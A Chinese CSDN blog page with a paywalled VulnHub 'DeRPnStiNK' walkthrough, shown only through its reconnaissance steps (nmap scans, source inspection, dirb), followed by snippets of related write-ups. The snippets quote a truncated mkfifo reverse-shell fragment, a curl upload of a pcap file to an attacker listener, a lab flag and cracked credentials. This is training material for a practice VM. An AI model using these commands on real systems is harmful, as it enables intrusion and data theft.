vulnhub系列:DeRPnStiNK

最新推荐文章于 2025-04-28 17:27:02 发布
最新推荐文章于 2025-04-28 17:27:02 发布
阅读量768 收藏 12
点赞数 22
分类专栏: vulnhub系列 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/jq_j37/article/details/141001508
版权

vulnhub系列:DeRPnStiNK

靶机下载

一、信息收集

nmap扫描存活,根据mac地址寻找IP

nmap 192.168.23.0/24

image-20240807181243169

nmap扫描端口,开放端口:21、22、80

nmap 192.168.23.182 -p- -A -sV -Pn

image-20240807181348725

访问80端口

image-20240807181531741

flag 1

f12查看源码,发现第一个flag

image-20240807181725873

看到一个txt文件

image-20240807181834601

在/webnootes/info.txt 中,得到提示,在hosts中配置dns

image-20240807181847004

dirb目录扫描,存在phpmyadmin,目录javascript、php、temporary、weblog等,

dirb http://192.168.23.182/

image-20240807182337488

访问temporary,让我加油

image-20240807182843675

访问weblog,发现页面跳转,之前要修改的hosts应该就是这个

http://derpnstink.local/weblog/

最低0.47元/天 解锁文章
小白的靶机-VulnHub-DerpNStink
wo41ge的博客
12-17 417
继续 继续 淦靶机 靶机地址:https://www.vulnhub.com/entry/derpnstink-1,221/ 目标:得到root权限&找到四个flag.txt ok 开始操作了 开机界面就是个这 轻车熟路 的搞一下 找到了此次CTF目标计算机IP地址:192.168.120.136 综合信息 21端口--FTP 22端口--SSH 80端口--HTTP 优先看看80端口 直接访问 F12找一找 作者可太行了 这不就有了吗 flag1=52E37291AEDF6A46D7D
VulnHub2018_DeRPnStiNK靶机
m0_61995767的博客
08-08 1002
VulnHub2018_DeRPnStiNK打靶记录
VulnhubDeRPnStiNK渗透测试
mandarava的博客
03-08 1115
老规矩,用nmap扫一下。发现端口80、22、21、514。输入命令nmap -T4 -a -v xxx.xxx.xxx.xxx。 Nmap scan report for xxx.xxx.xxx.xxx Host is up (1.2s latency). Not shown: 996 closed ports PORT STATE SERVICE 21/tcp open f...
7-Vulnhub-DeRPnStiNK
尼德霍格007
07-19 302
VulnHub-DeRPnStiNK 靶机地址:https://www.vulnhub.com/entry/derpnstink-1,221/ 目标:得到root权限&找到四个flag.txt 作者:尼德霍格007 时间:2021-7-19 信息收集 漏洞复现环境使用vmware虚拟机,kali机与靶机都使用NAT网络 kali扫描目标主机ip地址 nmap -sP 192.168.21.0/24 扫描靶机开放的1-10000的端口 nmap -A -p 1-10000 192.168.21.1
vulnhub(11):derpnstink(hydra爆破用户名和密码、验证的文件上传)
anddddoooo的博客
09-20 1463
直接:echo "mkfifo /tmp/f;| unclestinky | *9B776AFB479B31E8047026F1185E952DD1E530CB | <===========用来登录 wordpress。直接再靶机上:curl -X POST --data-binary @./derpissues.pcap http://192.168.159.47:8000/
Vulnhub-DERPNSTINK: 1-靶机渗透学习
嗯嗯呐的博客
11-19 2378
靶机地址:https://www.vulnhub.com/entry/derpnstink-1,221/ 靶机难度:中等(CTF) 靶机描述:这是基于Ubuntu的boot2root虚拟机。它已使用DHCP设置的网络接口在VMware Fusion和VMware Workstation12上进行了测试。它旨在模拟我在OSCP实验室中遇到的一些较早的机器,同时还带有一些较小的曲线球,但是没有什么花哨的。坚持经典的黑客方法,并列举所有内容! 目标:找到所有4个标志,最终将您带到完全root访问权限 作者:嗯嗯呐
vulnhub系列:Hackademic.RTB1
jq_j37的博客
08-13 488
vulnhub系列:Hackademic.RTB1靶机,打靶文章
Vulnhub项目:ICA: 1
Ays.Ie的博客
05-07 1033
Vulnhub项目:ICA: 1
vulnhub:DeRPnStiNK
墨染的博客
10-09 1809
环境搭建 下载虚拟机包文件VMware或VirtualBox打开,配置网络模式为NAT模式。 下载链接:https://download.vulnhub.com/derpnstink/VulnHub2018_DeRPnStiNK.ova hash:949e2f8a7d63fabdc55c675c95efe022 开搞 flag1 首先nmap -sP 192.168.14.1/24一波找一下...
VULNHUB-DERPNSTINK: 1-靶机渗透
weixin_52374319的博客
05-13 937
VULNHUB-DERPNSTINK: 1-靶机渗透 靶机难度:中等(CTF) 靶场地址:https://www.vulnhub.com/entry/derpnstink-1,221/ kali攻击机ip:192.168.43.135 信息收集 arp-scan -l #扫描靶机ip 端口扫描 nmap -sC -sV -T4 192.168.43.73 可以看到21,22,80端口开放 访问80端口,呆呆二人组。。。。。 好干净的页面,看一下源代码找到第一个flag dirb目录爆破一
数据本地存储
10-11
android 本地数据存储,缓存,有SQLite存储,Sharedferences存储,文件等
VulnHub-DerpNStink:1渗透学习
我是小小白的博客
07-13 1093
前言 靶机地址:https://download.vulnhub.com/derpnstink/VulnHub2018_DeRPnStiNK.ova 靶机难度:中级(CTF) 靶机发布日期:2018 年 2 月 9日 靶机描述:Derp 先生和 Stinky 叔叔是两位正在创办自己的公司 DerpNStink 的系统管理员。他们没有聘请合格的专业人士来建立他们的 IT 环境,而是决定将他们自己的系统组装在一起,该系统几乎准备好上线...... 目标:得到root权限&找到4个flag文件
看完这篇 教你玩转渗透测试靶机Vulnhub——DerpNStink:1
Aluxian_的博客
02-02 1872
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:需要获得root权限找到flagmedium (中等的)1.信息收集工具得使用2.wpscan和msfconsole的使用,了解模块的利用3.curl读取源码,以及msf反弹shell到本机 (这个是新知识的需要学习)4.数据库的增删改查 以及查看的相关命令,john字典爆破5.SSH。
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(五)DerpNStink:1【从外部网站到穿透内网提权!! !】
hyjcking的博客
11-28 1018
这台靶机我用了将近两天的时间才拿下,真的是比较有难度的一台中级靶机,里面涉及到了许多渗透测试的知识和技巧,值得花时间好好研究一番。可以发现建站用的是wordpress,hh这就很舒服了,一般在打靶的时候发现wordpress建站说明就是突破口,我们可以用wpscan扫一下。得到密码为wedgie57,再登录一下刚才登的网站,用户名是Unclestinky,只找到了之前在数据库发现的flag2,没有其他信息了。之前nmap扫出来过22端口,尝试ssh登录,发现没法用密码登录,需要指纹密钥。
DerpNStink打靶思路详解(vulnhub),2024最新腾讯网络安全面试分享
2401_84411822的博客
04-17 1010
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
奶奶去世了
qwer_boo 的专栏
08-14 1761
早上还在上自习,维勋打电话问我啥时候回去,奶奶刚才去世了,他现在就回,我很艰难的说“我回不去”,他也没说啥,就挂电话了。   之前爸爸跟我说等奶奶入土的前一天我回来,可是打完电话我开始犹豫了,这两天我还能看进去书吗,我是不是太过分了,奶奶和我最亲,其他人都回去了,我却还在。打电话给爸爸,爸爸说过两天再回来,就直接挂电话了。也不知道为啥,听到奶奶去世的消息我竟然很木讷,我不知道咋了,想哭却很难哭出
IEEE会议:第十届网络安全与信息工程国际会议(ICCSIE 2025)
最新发布
iaast的博客
04-28 476
2025西部信息工程与技术学术论坛暨第十届网络安全与信息工程国际会议(10th International Conference on Cyber Security and Information Engineering)将于7月23-25日西宁召开。本届会议由北京工业大学、青海理工学院主办,浙江工业大学协办,IEEE计算机学会(IEEE Computer Society)技术赞助。
2025蓝桥杯省赛网络安全组wp
2301_79035389的博客
04-27 912
这个也是在赛后才想明白,aes加密用的是十六字节,将前十一个都填成AAAA发过去,因为ecb模式是分组加密,每一组的加密过程都是一样的,所以不需要写脚本还原加密过程去破解(其实硬写也做不到,因为拿不到key,当时我觉得用户名肯定是key,不然解不了,于是就一直卡在这一步了,实际上用户名是明文),直接将发过来的加密数据取出后几组就是admin的加密了。首先是一个按位与,我们都知道,如果gift的结果是1,那说明参与按位与的两个数在对应位置上一定是1.这道题想到思路了,但是忘记dfs怎么写了,脚本没写出来。
vulnhub Leeroy: 1
01-06
### VulnHub Leeroy:1 下载和相关信息 VulnHub 是一个提供各种虚拟机镜像用于安全测试和学习平台漏洞利用技巧的网站。Leeroy:1 是其中一个基于 Jenkins 的 Web 应用程序,旨在帮助用户练习并理解如何通过 Groovy ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值